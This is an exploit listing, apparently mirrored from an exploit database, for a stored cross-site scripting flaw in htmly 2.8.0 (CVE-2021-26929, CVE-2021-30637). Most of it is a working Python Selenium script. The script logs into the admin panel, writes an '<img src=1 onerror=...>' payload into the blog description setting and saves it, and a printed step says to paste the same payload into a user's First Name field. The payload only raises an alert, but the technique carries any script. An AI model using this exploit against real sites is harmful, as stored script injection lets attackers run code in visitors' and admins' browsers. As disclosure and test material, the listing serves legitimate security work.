Exploit for htmly 2.8.0 Cross Site Scripting CVE-2021-26929 CVE-2021-30637

Name: Exploit for htmly 2.8.0 Cross Site Scripting CVE-2021-26929 CVE-2021-30637
Rating: 5 (218 reviews)
2021-04-15 | CVSS 4.3
## https://sploitus.com/exploit?id=PACKETSTORM:162195
# Exploit Title: htmly 2.8.0 allows stored XSS  
# Authors: @nu11secur1ty & G.Dzhankushev  
# Date: 04.15.2021  
# Vendor: htmly  
# Link: https://github.com/danpros/htmly  
# CVE: CVE-2021-30637  
  
[+] Exploit Source:  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-26929  
  
[Exploit Program Code]  
  
#!/usr/bin/python3  
# Authors: @nu11secur1ty, G,Dzhankushev  
# CVE-2021-30637  
  
from selenium import webdriver  
from selenium.webdriver.common.by import By  
from selenium.webdriver.support.ui import WebDriverWait  
from selenium.webdriver.support import expected_conditions as EC  
import time  
  
  
#enter the link to the website you want to automate login.  
website_link="http://localhost/htmly/login"  
  
#enter your login username  
username="nu11secur1ty"  
  
#enter your login password  
password="password"  
  
#enter the element for username input field  
element_for_username="user"  
#enter the element for password input field  
element_for_password="password"  
#enter the element for submit button  
element_for_submit="submit"  
  
  
#browser = webdriver.Safari() #for macOS users[for others use chrome vis  
chromedriver]  
browser = webdriver.Chrome() #uncomment this line,for chrome users  
#browser = webdriver.Firefox() #uncomment this line,for chrome users  
  
browser.get((website_link))  
  
try:  
username_element = browser.find_element_by_name(element_for_username)  
username_element.send_keys(username)  
password_element = browser.find_element_by_name(element_for_password)  
password_element.send_keys(password)  
signInButton = browser.find_element_by_name(element_for_submit)  
signInButton.click()  
  
# Exploit .ini  
browser.get(("http://localhost/htmly/admin/config"))  
browser.execute_script("document.querySelector('[name=\"-config-blog.description\"]').innerText  
= '</span><img src=1 onerror=alert(1) /><span>'")  
time.sleep(3)  
browser.execute_script("document.querySelector('.btn.btn-primary').click()")  
  
print("If everything is ok, please paste this code in to the Users in  
section First Name\n")  
  
except Exception:  
#### This exception occurs if the element are not found in the webpage.  
print("Some error occured :(")  
  
---------------------------------  
  
# Exploit Title: htmly 2.8.0 allows stored XSS  
# Date: 04.15.2021  
# Exploit Authotr @nu11secur1ty  
# Exploit Debugging: G.Dzhankushev  
# Vendor Homepage: htmly  
# Software Link: https://github.com/danpros/htmly  
# Video: https://www.youtube.com/watch?v=xKRQZYqVlS4  
  
# Steps to Reproduce:  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-30637